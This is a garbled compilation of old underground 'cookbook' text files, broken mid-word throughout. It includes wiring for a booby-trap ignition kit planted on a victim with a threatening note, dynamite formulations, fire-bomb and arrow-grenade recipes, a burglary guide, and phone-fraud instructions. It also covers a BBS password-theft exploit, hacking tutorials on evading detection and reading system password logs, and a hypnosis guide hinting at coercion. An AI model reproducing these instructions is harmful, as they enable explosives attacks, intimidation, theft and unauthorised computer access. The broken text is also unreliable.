304-344-793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3  403-425-2652    805  415-543-286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4  912-784-0440    806  512-828-250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5  405-236-6121    807  416-443-054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6  303-293-8777    808  212-334-433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8  415-543-6374    809  212-334-433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9  713-861-7194    812  317-265-48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2  413-633-5600    813  813-228-787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3  617-787-5300    814  412-633-56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4  608-252-6932    815  217-525-58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5  415-543-6374    816  816-275-278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6  416-443-0542    817  214-464-74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7  314-721-6626    818  415-781-527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8  514-725-2491    819  514-725-249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9  614-464-0123    901  615-373-579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1  405-236-6121    902  902-421-41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2  502-583-2861    904  912-784-04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3  206-382-5124    906  313-223-869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4  504-245-5330    907  ***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5  303-293-8777    912  912-784-04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6  506-648-3041    913  816-275-278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7  402-580-2255    914  518-471-81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9  206-382-5124    915  512-828-250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2  512-828-2501    916  415-543-286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3  614-464-0123    918  405-236-612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4  514-725-2491    919  912-784-04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5  402-580-2255    516  518-471-81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7  313-223-8690    518  518-471-81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9  416-443-0542    900  201-676-707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 Terrorism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starts when a big, dumb lummox rudely insults you.  Being o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ional, intelligent disposition, you wisely choose to avoi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 confrontation.  But as he laughs in your face, you sm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wardly---your revenge is already plan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1:  follow your victim to his locker, car, or house.  Onc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chosen your target site, lay low for a week or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ting your anger b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2:  in the mean time, assemble your versatile terro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t(details be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3:  plant your kit at the designated target site on a mon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ning between the hours of 4:00 am and 6:00 am.  Includ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m, suggestive note that quietly hints at the possi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nother attack.  Do not write it by hand!  An exampl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effective n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n't be such a jerk, or the next one will take off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nd.  Have a nice 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ice how the calm tone instills fear.  As if written by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icidal psychopa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5:  choose a strategic location overlooking the target site.  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position yourself in such a way that you can see his facial contor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6:  sit back and enjoy the fireworks! Assembly of the versat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conomic, and effective terrorist kit #1: the parts you'll need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4 aa batte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1 9-volt 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1 spdt mini relay (radio sh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1 rocket engine(smoke bomb or m-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1 solar ignitor (any hobby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1 9-volt battery connec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1:  take the 9-volt battery and wire it through the relay's c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ircuit should also include a pair of contacts that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parated cut off this circuit.  These contacts should be held toge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rapping them between the locker,mailbox, or car do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the door is opened, the contacts fall apart and the 9-volt circu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broken, allowing the relay to fall to the closed pos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us closing the ignition circuit. (If all this is confusing tak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 at the schematic be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2:  take the 4 aa batteries and wire them in succes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re the positive terminal of one to the negative terminal of an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all four are connected except one positive terminal and one nega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minal.  Even though the four aa batteries only combine to create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ts, the increase in amperage is necessary to activate the sol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gnitor quickly and effective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3:  take the battery pack (made in step 2) and wire one end of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relay's single pole and the other end to one prong of the sol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gnitor.  Then wire the other prong of the solar ignitor back to the op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ition on the re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4:  using double sided carpet tape mount the kit in his loc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box, or car door. And last, insert the solar ignitor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et engine (smoke bomb or m-8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kit is now comple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CONTACTS)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  (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COIL)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WITCH) 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 (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  ( P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LAR IGNI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Start A Conference w/o 2600hz or M-F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iginally an Apple ][ file, forgive the upper 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ETHOD OF STARTING THE CONF. DEPENDS ON YOUR ABILITY TO BULLSHI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INTO DIALING A NUMBER WHICH CAN ONLY BE REACHED WITH AN OPERA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F TONES.  WHEN BULLSHITTING THE OPERATOR REMEMBER OPERATOR'S ARE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RED TO THINK BUT TO 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IS A STEP-BY-STEP WAY TO THE CON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CALL THE OPERATOR THROUGH A PBX OR EXTENDER, YOU COULD JUST CALL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YOUR LINE BUT I WOULDN'T RECOMMEN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SAY TO TH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SPS MAINTENENCE ENGINEER, RING-FORWARD TO 213+080+1100, POSITION RELE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K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 WILL PROBABLY ASK YOU FOR THE NUMBER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INITIONS: RING-FORWARD - INSTRUCTS HER TO DIAL TH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ITION RELEASE - INSTUCTS HER TO RELEASE THE TRUNK AFTER SHE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ED TH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REMBER TO SAY 213PLUS080 PLUS1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WHEN YOU ARE CONNECTED WITH THE CONF. YOU WILL HERE A WHISTLE B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ICE AND A RECORDING ASKING YOU FOR YOUR OPERATOR #. DIAL IN ANY F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ITS AND HIT THE POUNDS SIGN A COUPLE OF TIMES. SIMPLY DIAL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BILLING LINE ECT. WHEN THE RECORDING ASK FOR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WHEN IN THE CONTROL MODE OF THE CONF. HIT '6' TO TRANSFER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001' TO REENTER THE # OF CONFEREE'S AND TIME AMOUNT WHICH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VE WHEN YOU STARED THE CONF. REMEMBER THE SIZE CAN BE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59 CONFEREE'S. I HAVE NOT FOUND OUT THE 'LENGTHS' LIM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Make Dynamit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ynamite is nothing more than just nitroglycerin and a stabliz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ent to make it much safer to use.  For the sake of saving time,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abbreviate nitroglycerin with a plain NG.  The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percentages, be sure to mix these carefully and be sure to u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ct amounts.  These percentages are in weight ratio, not volu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ngredients                 amou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NG                          3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dium nitrate              2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monium oxalate            2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uncotten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NG                          2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nitrate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dium nitate               5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monium oxalate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NG                          3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nitrate           44.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uncotton                    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seline                     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wdered charcoal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NG                          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nitrate           2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ium nitrate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rch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NG                          5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nitrate           1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monium oxalate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uncotton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NG                          1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dium nitrate              7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chloride           4.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alk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NG                          2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ium nitrate              3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dium carbonate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   NG                          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hydrous sodium sulfate    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   NG                          2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nitrate           3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33.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monium oxalate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  NG                          2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nitrate           3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4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  NG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dium nitrate              62.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2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dium carbonate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  NG                          3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dium nitrate              2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monium oxalate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  NG                          3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nitrate           2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monium oxalate            3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uncotton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4  NG                          3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10.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monium oxalate            2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uncotton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perchloride       2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5  NG                          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dium nitrate              4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6  NG                          4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rch                      5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uncotton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7  NG                          3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dium nitrate              22.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40.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chloride           7.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  NG                          5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dium nitrate              32.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1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monium oxalate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9  NG                          2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nitrate           27.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meal                    3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monium oxalate             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ium nitrate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lcium carbonate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usehold equivalants for chemic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has come to my attention that many of these chemicl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d under brand names, or have household equivalants.  here is a l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might help you out. Also, see elsewhere in this Cookbook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ore complete li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etic acid                vine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oxide             alum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potassium sulfate alu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sulfate           alu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monium hydroxide         ammon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on carbonate           cha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um hypochloride       bleaching pow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um oxide              l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um sulfate            plaster of par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onic acid              seltz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on tetrachloride       cleaning flu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hylene dichloride        Dutch flu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rric oxide               iron r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ucose                    corn syr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phite                   pencil l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chloric acid          muriatic ac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gen peroxide          perox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acetate               sugar of l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tetrooxide            red l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nesium silicate         tal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nesium sulfate          Epsom sal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phthalene                mothb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enol                     carbolic ac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ssium bicarbonate      cream of tart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ssium chromium sulf.   chrome alu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ssium nitrate          saltp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dioxide             s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bicarbonate         baking so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borate              bor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carbonate           washing so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chloride            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hydroxide           ly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silicate            water gl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sulfate             glauber's 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thiosulfate         photographer's hyp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lferic acid              battery ac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rose                    cane su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inc chloride              tinner's flu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ep this list handy at all times. If you can't seem to get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more of the ingredients try another one.  If you still can't,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always buy small amounts from your school, or maybe from vari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mical companies.  When you do that, be sure to say as little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sible, if during the school year, and they ask, say it's for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eriment for sch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 Exhaust Flame Thrower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is one, all you need is a car, a sparkplug, ignition wire an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 Install the spark plug into the last four or five inche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ailpipeby drilling a hole that the plug can screw into eas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ach the wire (this is regular insulated wire) to one sid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 and to the spark plug. The other side of the switch is attach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positive terminal on the battery. With the car running, simp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switch and watch the flames fly!!! Again be careful that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is behind you! I have seen some of these flames go 20 fe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ing into BBS Express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high enough access on any BBS Express BBS you can ge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op's password without any problems and be able to log on as him and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ever you like. Download the Pass file, delete the whole BBS, an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ll a matter of uploading a text file and d/ling it from the BB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t have high enough access to see new uploads to do this. If you can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ile you just uploaded you have the ability to break into the BBS i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w easy ste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y am I telling everyone this when I run BBS Express my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here is one way to stop this from happening and I want other Syso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e aware of it and not have it happen to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ing in is all based on the MENU function of BBS Express. Exp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let you create a menu to display different text files by putt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MENU at the top of any text file and stating what files are t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layed. But due to a major screw up by Mr. Ledbetter you can use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U option to display the USERLOG and the Sysop's Passwords or an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se you like. I will show you how to get the Sysop's pass and ther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 on as the Sysop. BBs Express Sysop's have 2 passwords. One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one else gets in the form of X1XXX, and a Secondary pass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ake it harder to hack out the Sysops p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condary pass is found in a file called SYSDATA.D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ile must be on drive 1 and is therefore easy to get. All you hav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is upload this simple Text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1:SYSDATA.D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poff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you upload this file you d/l it non-Xmodem. Stupid Express thin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displaying a menu and you will se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poff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on [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hit 1 and Express will display the SYSDATA.DAT file.OPPASS is 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ysop's Secondary pass will be. D1:USERLOG.DAT is where you will f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ame and Drive number of the USERLOG.DAT file. The Sysop might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named this file or put it in a Subdirectory or even on a differ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ve. I Will Assume he left it as D1:USERLOG.DAT. The other parts of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tell you where the .HLP screens are and where the LOG is save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 Download path na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o get the Sysop's primary pass you upload a text file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1:USERLOG.D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ing into Bedwetter's BB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ain you then d/l this file non-Xmodem and you will se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ing into Bedwetter's BB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on [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hen hit 1 and the long USERLOG.DAT file comes flying at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ysop is the first entry in this very long file so it is easy. You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OP'S NAME        X1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uld now have his 2 passwo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only one easy way out of this that I can think of, and tha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ake all new uploads go to SYSOP level (Level 9) access only. This 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pull off what I just explai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is is a major Bug on Mr. Ledbetter's part. I just don't know wh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one had thought of it before. I would like to give credit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line for the message he left on Modem Hell telling about this probl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lso to Unka for his ideas and input about correcting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has been brought to you from [_The_Piper_] and the S.O.D. B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bomb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fire bombs are simply gasoline filled bottles with a fu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aked rag in the mouth (the bottle's mouth, not yours). The orig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lotov cocktail, and still about the best, was a mixture of one p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soline and one part motor oil. The oil helps it to cling to wha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latter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use one part roofing tar and one part gasoline. Fire bo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been found which were made by pouring melted wax into gaso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se Ignition Bomb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our strand homemade fuse is used for this. It burns like fu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held down and concealed by a strip of bent tin cut from a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xposed end of the fuse is dipped into the flare igniter.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ne, you light the fuse and hold the fire bomb until the fuse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rned out of sight under the tin. Then throw it and when it brea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urning fuse will ignite the cont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eric Bomb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Aquire a glass contai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Put in a few drops of gaso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Cap the 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Now turn the container around to coat the inner surfaces and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apor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Add a few drops of potassium permanganate (&lt;-Get this stuff from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nake bite k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The bomb is detonated by throwing aganist a solid obj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THROWING THIS THING RUN LIKE HELL THIS THING PACKS ABOUT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 OF DYNAM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n Box Pla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ying the initial rate in order to use a red box (on cert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tresses) left a sour taste in many red boxers mouths, thu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n box was invented. The green box generates useful tones such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IN COLLECT, COIN RETURN, AND RINGBACK. These are the tone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S or the TSPS operator would send to the CO when appropri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fortunately, the green box cannot be used at the fortress station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t be used by the CALLED par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the t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IN COLLECT     700+1100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IN RETURN      1100+1700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GBACK         700+1700hz</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the called party sends any of these tones, an operator reale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 should be sent to alert the MF detectors at the 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an be done by sending 900hz + 1500hz or a single 2600 wink (90 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do not forget that the initial rate is collected shortly befor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minute period is up. Incidentally, once the above M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nes for collecting and returning coins reach the CO, they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rted into an appropriate DC pulse (-130 volts for retur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30 for collect). This pulse is then sent down the tip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tress. This causes the coin relay to either return or collect the co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lledged "T-network" takes advantage of this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a pulse for coin collect (+130 VDC) is sent down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must be grounded somewhere. This is usually the yellow or black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us, if the wires are exposed, these wires can be cut to prev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ulse from being grounded. When the three minute init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iod is almost up, make sure that the black and yellow wir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red, then hang up, wait about 15 seconds in case of a sec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se, reconnect the wires, pick up the phone, and if all goes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should be "JACKPOT"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able Grenade Launcher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a bow, this one is for you. Remove the ferrule from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arrow, and fill the arrow with black powder (I use gr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FFF, it burns easy)and then glue a shotshell primer into the h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 where the ferrule went. Next, glue a BB on the primer, and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ready to go! Make sure no one is nearby.... Little shred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go all over the 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Tutorial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s hac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rding to popular belief the term hacker and hacking was founded at m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comes from the root of a hack writer,someone who keeps "hacking"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ypewriter until he finishes the story.a computer hacker w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at the keyboard or password wor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you n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ck you need a computer equipped with a modem (a device that let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mit data over phone lines) which should cost you from $100 to $12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do you h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recuires two th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he phon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nswer to identity el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do you find the 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three basic ways to find a computers phon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Scan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Direc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nside inf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s scan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nning is the process of having a computer search for a carrier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xample,the computer would start at (800) 111-1111 and wait for carr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re is none it will go on to 111-1112 etc.if there is a carrier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record it for future use and continue looking for m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s directory assic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ay can only be used if you know where your target computer is. For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 say it is in menlo park, CA and the company name is sr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Dial 411 (or 415-555-12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Say "Menlo pa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Say "S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Write down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Ask if there are any more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If so write them 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Hang up on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 Dial all numbers you were gi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 Listen fir carrier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 If you hear carrier tone write down number, call it on your modem and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to h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asics of Hacking II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s to know before doing anything, essential to your continu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eer as one of the elite in the country...  This articl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 to the world of hacking" is meant to help you by telling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not to get caught, what not to do on a computer system, what typ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ment should I know about now, and just a little on the history, p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ent future, of the hack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the world of hacking! We, the people who live outsid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mal rules, and have been scorned and even arrested by those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vilized world', are becomming scarcer every day.  This is due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ater fear of what a good hacker (skill wise, no moral judge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can do nowadays, thus causing anti- hacker sentiment in the ma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few hackers seem to actually know about the computer systems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 or what equipment they will run into on the front end, or what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do wrong on a system to alert the 'higher' authorities who mon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ystem. This article is intended to tell you about some things no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even before you get on the system.  I will tell you about the new w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front end security devices that are beginning to be used on compu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attempt to instill in you a second identity, to be brought up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of great need, to pull you out of trouble. And, by the way, I take no, repe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responcibility for what we say in this and the forthcoming artic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of the bullshit, on to the fun: after logging on your favorite b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ee on the high access board a phone number!  It says it's a gre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to "fuck around with!" This may be true, but how many other peo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going to call the same number?  So:  try to avoid calling a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n to the public. This is because there are at least every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 calling, and how many other boards will that number sprea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call a number far, far away, and you plan on going thru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tender or a re-seller, don't keep calling the same access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 As you would if you had a hacker running), this looks very suspici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an make life miserable when the phone bill comes in th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cities have a variety of access numbers and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use as many as you can. Never trust a change in the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414's, the assholes, were caught for this reason: when one of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ed to the system, there was nothing good there.  The next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a trek game stuck right in their way!  They proceded to play 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me for two, say two and a half hours, while telenet was tracing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ce job, don't you think?  If anything looks suspicious, drop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mediately!!  As in, yesterday!! The point we're trying to get accros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use a little common sence, you won't get busted.  Let the li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ds who aren't smart enough to recognize a trap get busted, it will t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eat off of the real hackers. Now, let's say you get on a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It looks great, checks out, everything seems f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 now is when it gets more dangerous.  You have to know the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ystem to know what not to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ally, keep away from any command something, copy a new file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unt, or whatever!  Always leave the account in the same statu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ged in with.  Change *nothing*... If it isn't an account with priv'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don't try any commands that require them! All, yes all, system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to be keeping log files of what users are doing, and that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w up.  It is just like dropping a trouble-card in an ESS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nding that nice operator a pretty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nd no excessive amounts of time on the account in one stre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ep your calling to the very late night ifpossible, or du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iness hours (believe it or not!).  It so happe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re are more users on during business hours, and it is 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icult to read a log file with 60 users doing many commnds every min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to avoid systems where everyone knows each other, don't try to blu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bove all:  never act like you own the system, or are the best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hey always grab the people who's heads swell... There is some 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esting front end equipment around nowadays, but first l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ine terms... By front end, we mean any device that you m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 thru to get at the real computer. There are devices that are mad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eat hacker programs, and just plain old multiplex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efeat hacker programs, there are now devices that pick up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just sit there...  This means that your device gets no carr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us you think there isn't a computer on the other e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way around it is to detect when it was picked up.  If it pickes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the same number ring, then you know it is a hacker-defe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devices take a multi-digit code to let you into the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are, in fact, quite sophisticated to the point wher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also limit the user name's down, so only one name or set of na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be valid logins after they input the code... Other devices inpu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code, and then they dial back a pre-programmed number for that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systems are best to leave al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y know someone is playing with their phone.  You may think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just reprogram the dial-back." Think again, how stupid tha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they have your number, or a test loop if you were just a li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rter. If it's your number, they have your balls (if ma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ts a loop, then you are screwed again, since those loo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monitored*. As for multiplexers...  What a plexer is suppo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o is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ystem can accept multiple users. We have to time share, so we'll l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ront-end processor do it...  Well, this is what a multiplexer d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ually they will ask for something like "enter class" or "line:".  Usu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programmed for a double digit number, or a four to five letter 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usually a few sets of numbers it accepts, but those numbers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 your 300/1200/2400 baud data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multiplexers are inconvenient at best, so not to worry. A li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the history of hacking: hacking, by my definition, means a gre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ledge of some special area. Doctors and lawy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hackers of a sort, by this definition.  But most often,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ing used in the computer context, and thus we have a definition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one who has a great amount of computer or telecommuni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ledge."  You are not a hacker because you have a list of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by my definition, has then been around only about 15 yea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started, where else but, mit and colleges where they had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ence or electrical engineering depart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ers have created some of the best computer languag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awesome operating systems, and even gone on to make mill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used to have a good name, when we could honestly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know what we are doing".  Now it means (in the public ey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414's, ron austin, the nasa hackers, the arpanet hack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 people who have been cau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done damage, and are now going to have to face fines and sent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us we come past the moralistic crap, and to our purpose:  educat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er community, return to the days when people actually knew someth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DEC'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article you will learn how to log in to dec's, logging out, and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un stuff to do in-between.  All of this information is based o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ndard dec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there are dec systems 10 and 20, and I favor, the dec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ill be more info on them in this article.  It just so happe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 dec 20 is also the more common of the two, and is used by m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interesting people (if you know what I mean...) Ok, the first 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ant to do when you are receiving carrier from a dec system is to f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the format of login names.  You can do this by looking at who is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gt; `  (the 'exec' level pro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s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 is short for sy(stat) and shows you the system stat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uld see the format of login na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ystat usually comes up in this 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b  line  program  us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b:  the job number (not important unless you want to log them off l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what line they are on (used to talk to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are both two or three digit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what program are they running under?  If it says 'exe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aren't doing anything at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  ahhhahhhh!  This is the user name they are logged in un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 the format, and hack yourself outa working code... Login format is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login username pass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name is the username in the format you saw above in the syst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you hit the space after your username, it will stop echo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acters back to your screen.  This is the password you are typing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people  usually use their name, their dog's name, the name o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vorite character in a book, or something like this. A few cl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have it set to a key cluster (qwerty or asdfg).  Pw's can be from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8 characters long, anything after that is ignored. You are finally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ould be nice to have a little help, wouldn't it?  Just type a ? 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help, and it will give you a whole list of topi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handy characters for you to know would be the control ke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n't it? Backspace on a dec 20 is rub which is 255 on your ascii ch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dec 10 it is cntrl-h. To abort a long listing or a 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ntrl-c works fine.  Use cntrl-o to stop long output to the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andy when playing a game, but you don't want to cntrl-c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ntrl-t for the time. Cntrl-u will kill the whole line you are typing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ment.  You may accidently run a program where the only way ou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cntrl-x, so keep that in reserve. Cntrl-s to stop listing, cntrl-q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inue on both systems. Is your terminal having trou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it pauses for no reason, or it doesn't backspace right?  Thi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both systems support many terminals, and you haven't told it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s is yet... You are using a vt0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need to tell it you are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information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hows you what your terminal is set up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gt;all sorts of shit, the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set ter vt05 this sets your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to vt0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let's see what is in the account (here after abbreviated ac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you have hacked onto...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d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rt for directory, it sh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hat the user of the code has save to the disk.  There should be a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this:    xxxxx.Oooxxxxx is the file name, from 1 to 20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  Ooo is the file type, one of: exe, txt, dat, bas, cmd   and a f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s that are system depend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 is a compiled program that can be run (just by typing its name at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xt is a text file, which you can see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i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xxxxx.T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not try to=&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xxxxx.Exe this is very bad for your terminal and will tell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olutly no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 is data they have sa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 is a basic program, you can have it typed ou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md is a command type file, a little to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licated to go int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xxxxx.Cm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way, there are other users out there who may have files you can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e, why else am I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gt; dir &lt;*.*&gt; (Dec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dir [*,*]   (dec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s a wildcard, and will allow you to access the files on other accou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user has it set for public access. If it isn't set for public a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you won't see it. To run that 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username program-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name is the directory you saw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listed under, and file name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else but the file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ou are not al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you said (at the very start) sy  short for syst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we said this showed the other users on the system?  Well,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talk to them, or at least send a message to anyone you see listed i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at.  You can do this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gt; the user list (from your syst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talkusername (dec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nd username (dec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 allows you and them immediate transmission of whatever you/they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e sent to the other.  Send only allow you one message to be sen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 they will send back to you, with talk you can just keep going. B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you may be noticing with the talk command that what you type is st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ed upon by the parser (control program).  To avoid the constant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ssages type ei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your mes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rem your mes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mi-colon tells the parser that what follows is just a comment.  R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short for 'remark' and ignores you from then on until you type a cntrl-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cntrl-c, at which point it puts you back in the exec mode. To break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on from a talk command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break priv'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happen to have privs, you can do all sorts of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of all, you have to activate those priv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en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gives you a $ prompt, and allows you to do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ever you can do to your own directory you can now do to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directory. To create a new acct. Using your privs, just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build user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username is old, you can edit it, if it is new, you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ine it to be whatever you wish. Privacy means nothing to a user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vs.  By the way, there are various levels of privs:  operator, whe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el is the most powerful, being that he can log in from anywher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his pow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s have their power because they are at a special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owing them the privs.  Cia is short for 'confidential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ccess', which allows you a low level amount of priv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to worry though, since you can read the system log file, which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s the passwords to all the other accou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e-activate your privs,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dis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ve played your greedy heart out, you can finally leav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with the comman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logs the job you are using off the system (there may be vari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is such as kjob, or killjo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mless Bomb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ll those who do not wish to inflict bodily damage on their victi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only t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are weapons that should be used from high pla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he flour bo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wet paper towel and pour a given amount of baking flour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enter. Then wrap it up and put on a rubber band to keep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gether. When thrown it will fly well but when it hits, it cov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ctim with the flower or causes a big puff of flour which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the victim in terror since as far as they are concerned,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ange white powder is all over them. This is a cheap method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ror and for only the cost of a roll of paper towels and a bag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ur you and your friends can have loads of fun watching peo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ee in pan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Smoke bomb project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you need is a bunch of those little round smoke bombs an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ist rocket or any sling-shot. Shoot the smoke bombs and watc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ror since they think it will blow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Rotten eggs (good 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some eggs and get a sharp nee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oke a small hole in the top of each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them sit in a warm place for about a week. Then you've go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nch of rotten eggs that will only smell when they h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Glow in the dark t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one of those tubes of glow in the dark stuff and pou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uff on whatever you want to throw and when it gets on the vict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think it's some deadly chemical or a radioactive substance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run in total panic. This works especially well with flo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mbs since a gummy, glowing substance gets all over the vict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Fizzling pan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baggie of a water-baking soda solution and seal it. (M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e there is no air in it since the solution will form a ga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want it to pop on you.) Then put it in a bigger plast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g and fill it with vinegar and seal it. When thrown, the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tances will mix and cause a violently bubbling substance to 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ver the vict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ing Into House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ay You N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ear Gas or M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 BB/Pelet G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An Ice P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Thick Glo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You Do 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Call the ###-#### of the house, or ring doorbell,  To find out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y're h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If they're not home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Jump over the fence or walk through gate (what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If you see a dog give him the mace or tear g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Put the glove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Shoot the BB gun slightly above the window loc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Push the ice-pick through the hole (made by the BB g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  Enter wind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  FIRST...Find the LIVING ROOM. (they're neat things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  Then goto the Bed-room to get a pillow  case.  Put the goodie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illow c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  Get out &lt;-* FAS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You should have certian targets worked out (like compu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ios, Ect.,Ect.).    Also &lt;-* NEVER *-&gt; Steal from your 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igborhood. If you think they have an alarm...&lt;-* FORGET I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Guide to Hypnotism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iginally an Apple ][ file, forgive the upper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HAT HYPNOTISM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PNOTISM, CONTRARY TO COMMON BELEIF, IS MERELY STATE WHEN YOUR MIN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ARE IN A STATE OF RELAXATION AND YOUR MIND IS OPEN TO POSITIVE,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VERLY WORDED NEGATIVE, INFLUENCES.  IT IS NOT A TRANCE WHER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ARE TOTALLY INFLUENC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CANNOT LI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A SLEEP WHICH YOU CANNOT WAKE UP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OUT HEL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AY BRING DOWN YOUR HOPE SOMEWHAT, BUT, HYPNOTISM IS A POWERFUL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F HELP, AND/OR MISCHEI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OUR SUBCONCIOUS M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GOING IN FURTHER, I'D LIKE TO STATE THAT HYPNOTISM NOT ONLY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AT IN THE WAY THAT IT RELAXES YOU AND GETS YOU (IN THE LONG RUN)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ANT, BUT ALSO THAT IT TAPS A FORCE OF INCREDIBLE POWER, BELEIVE IT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THIS POWER IS YOUR SUBCONCIOUS M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UBCONCIOUS MIND ALWAYS KNOWS WHAT IS GOING ON WITH EVERY PART OF YOUR BO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MOMENT OF THE DAY.  IT PROTECTS YOU FROM NEGATIVE INFLU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RETAINS THE POWER TO SLOW YOUR HEARTBEAT DOWN AND STUFF LIK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UBCONCIOUS MIND HOLDS JUST ABOUT ALL THE INFO YOU WOULD LIKE TO K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YOURSELF, OR, IN THIS CASE, THE PERSON YOU WILL BE HYPNOTI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MANY WAYS TO TALK TO YOUR SUBCONCIOUS AND HAVE IT TALK BACK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ONE WAY IS THE OUJA BOARD, NO ITS NOT A SPIRIT, MEREL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DS OF THOSE WHO ARE USING IT.  ANOTHER, WHICH I WILL DISCUSS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HE PENDULUM METHOD.  OK, HERE IS HOW IT G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GET A RING OR A WASHER AND TIE IT TO A THREAD A LITTLE LONGER T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YOUR FOREARM.  NOW, TAKE A SHEET OF PAPER AND DRAW A BIG CIRCL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N THE BIG CIRCLE YOU MUST NOW DRAW A CROSSHAIR (A BIG +).  NOW, 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ET OF PAPER ON A TABLE.  NEXT, HOLD THE THREAD WITH THE RING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HER ON IT AND PLACE IT (HOLDING THE THREAD SO THAT THE RING IS 1 IN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VE THE PAPER SWINGING) IN THE MIDDLE OF THE CROSSHAIR.  NOW, S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HREAD SO THE WASHER GOES UP AND DOWN, SAY TO YOURSELF THE WORD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DO IT SIDE TO SIDE AND SAY THE WORD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IT COUNTER CLOCKWISE AND SAY "I DON'T K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LY, DO IT CLOCKWISE AND SAY "I DONT WANT TO SAY." NOW,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EAD BACK IN THE MIDDLE OF THE CROSSHAIR, ASK YOURSELF QUESTION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 FOR THE PENDULUM TO SWING IN THE DIRECTION FOR THE ANSWER. (YES,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KNOW OR I DONT WANNA SAY...). SOON, TO YOUR AMAZEMENT, IT W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SWERING QUESTIONS LIKE ANYTHING... LET THE PENDULUM ANSWER, DONT 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TRY YOU WILL NEVER GET AN ANSWER.  LET THE ANSWER COME TO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OW TO INDUCE HYPNOTIS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HAT YOU KNOW HOW TO TALK TO YOUR SUBCONCIOUS MIND, I WILL NOW TELL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GUIDE SOMEONE INTO HYPNOSIS. NOTE THAT I SAID GUIDE, YOU CAN N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NOTISE SOMEONE, THEY MUST BE WILLING. OK, THE SUBJECT MUST BE LYING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TING IN A COMFORTABLE POSITION, RELAXED, AND AT A TIME WHEN THINGS AR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TO BE INTERRUP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M THE FOLLOWING OR SOMETHING CLOSE TO IT, IN A PEACEFUL, MONOTIN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NE (NOT A COMMANDING TONE OF VO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LIGHT A CANDLE AND PLACE IT SOMEWHERE WHERE IT CAN BE EASILY S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DEEP BREATH THROUGH YOUR NOSE AND HOLD IT IN FOR A COUNT OF 8.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YOUR MOUTH, EXHALE COMPLETELY AND SLOWLY. CONTINUED BREATHING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EP, BREATHS THROUGH YOUR NOSE AND EXHALING THROUGH YOUR MOUTH.  TENSE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YOUR MUSCLES VERY TIGHT, NOW, COUNTING FROM TEN TO ONE, RELEASE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OWLY, YOU WILL FIND THEM VERY RELAXED.  NOW, LOOK AT THE CANDLE,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AT IT, WITH EVERY BREATH AND PASSING MOMEMENT, YOU ARE FEE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REASINGLY MORE AND MORE PEACEFUL AND RELAXED.  THE CANDLES FLAM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ACEFUL AND B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YOU LOOK AT IT I WILL COUNT FROM 100 DOWN, AS A COUNT, YOUR EYES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OME MORE AND MORE RELAXED, GETTING MORE AND MORE TIRED WITH EA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ING MO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COUNT DOWN FROM 100, ABOUT EVERY 10 NUMBERS SAY "WHEN I REACH XX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YES (OR YOU WILL FIND YOUR EYES) ARE BECOMING MORE AND MORE TIRED."  T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 THEY MAY CLOSE THEIR EYES WHENEVER THEY FEEL LIKE IT.  IF THE PERS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YES ARE STILL OPEN WHEN YOU GET TO 50 THEN INSTEAD OF SAY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EYES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YOUR EY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IR EYES ARE SHUT SAY THE FOLLOWING. AS YOU LIE (OR SIT) HERE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EYES COMFORTABLY CLOSE YOU FIND YOURSELF RELAXING MOR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WITH EACH MOMENT AND BREA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LAXATION FEELS PLEASANT AND BLISSFUL SO, YOU HAPPILY GIVE WA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ONDERFUL FEELING. IMAGINGE YOURSELF ON A CLOUD, RESTING PEACEFU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 SLIGHT BREEZE CARESSING YOUR BODY.  A TINGLING SENSASION BE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WORK ITS WAY, WITHIN AND WITHOUT YOUR TOES, IT SLOWLY MOVES UP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T, MAKING THEM WARM, HEAVY AND RELAXED. THE CLOUD IS SOFT AND SUPPO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ODY WITH ITS SOFT TEXTURE, THE SCENE IS PEACEFUL AND ABSORB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EACEFULNESS ABSORBS YOU COMPLET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INGLING GENTLY AND SLOWLY MOVES UP YOUR LEGS, RELAXING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ING THEM WARM AND HEAVY.  THE RELAXATION FEELS VERY GOOD, IT FEELS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OD TO RELAX AND LET GO. AS THE TINGLING CONTINUES ITS JOURNEY UP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SOLAR PLEXUS, YOU FEEL YOUR INNER STOMACH BECOME VERY RELAXED.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MOVES SLOWLY INTO YOUR CHEST, MAKING YOUR BREATHING RELAXED AS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EELING BEGINS TO MOVE UP YOUR ARMS TO YOUR SHOULDERS, MAKING YOUR AR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VY AND RELAXED AS WELL.  YOU ARE AWARE OF THE TOTAL RELAXATION YOU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EXPERIENCING, AND YOU GIVE WAY TO IT.  IT IS GOOD AND PEACEFU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NGLING NOW MOVEVES INTO YOUR FACE AND HEAD, RELAXING YOUR JAWS, NECK,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CIAL MUSCLES, MAKING YOUR CARES AND WORRIES FLOAT AWAY. AWAY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SKY AS YOU REST BLISFUlLY ON THE CLOU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Y ARE NOT RESPONSIVE OR YOU THINK THEY (HE OR SHE..) IS GOING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EEP, THEN ADD IN A "...ALWAYS CONCENTRATING UPON MY VOICE, INGORING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SOUNDS.  EVEN THOUGH OTHER SOUNDS EXSIST, THEY AID YOU IN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ATION..." THEY SHOULD SOON LET OUT A SIGH AS IF THEY WERE LETTING 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IR FACE SHOULD HAVE A "WOODENESS" TO IT, BECOMING FEATURLESS...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THE FOLLOWING "....  YOU NOW FIND YOURSELF IN A HALLWAY, THE HALLWAY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ACEFUL AND NICE. AS I COUNT FROM 10 TO 1 YOU WILL IMAGINE YOUR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FURTHER AND FURTHER DOWN THE HALL. WHEN I REACH ONE YOU WILL F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SELF WHERE YOU WANT TO BE, IN ANOTHER, HIGHER STATE OF CONCIOU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D. (COUNT FROM TEN TO ONE)....." DO THIS ABOUT THREE OR FOUR TI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TO TEST IF THE SUBJECT IS UNDER HYPNOSIS OR NOT,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FEEL A STRANGE SENSATION IN YOUR (ARM THEY WRITE WITH) AR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BEGINS AT YOUR FINGERS AND SLOWLY MOVES UP YOUR ARM, AS IT MO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YOUR ARM YOUR ARM BECOMES LIGHTER AND LIGHTER, IT WILL SOON BE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 IT WILL .....  BECOMING LIGHTER AND LIGHTER WHICH EACH BREATH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R FINGERS SHOULD BEGIN TO TWITCH AND THEN MOVE UP, THE ARM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MY FRIEND, YOU HAVE HIM/HEP IN HYPNOSIS.  THE FIRST TIME YOU DO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HE/SHE IS UNDER SAY GOOD THINGS, LIKE:  "YOUR GOING TO FEEL GRE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MORROW" OR "EVERY DAY IN EVERY WAY YOU WILL FIND YOURSELF BECOMING B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TTER".. OR SOME CRAP LIKE THAT... THE MORE THEY GO UNDER, THE DEE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HYPNOSIS THEY WILL GET EACH TIME YOU DO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HAT TO DO WHEN HYPNOTI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VE THEM UNDER YOU MUST WORD THINGS VERY CAREFULLY TO GET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YOU CANNOT SIMPLY SAY...  TAKE OFF YOUR CLOTHES AND FUCK THE PI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HAT WOULD NOT REALLY DO THE TRICK. YOU MUST SAY 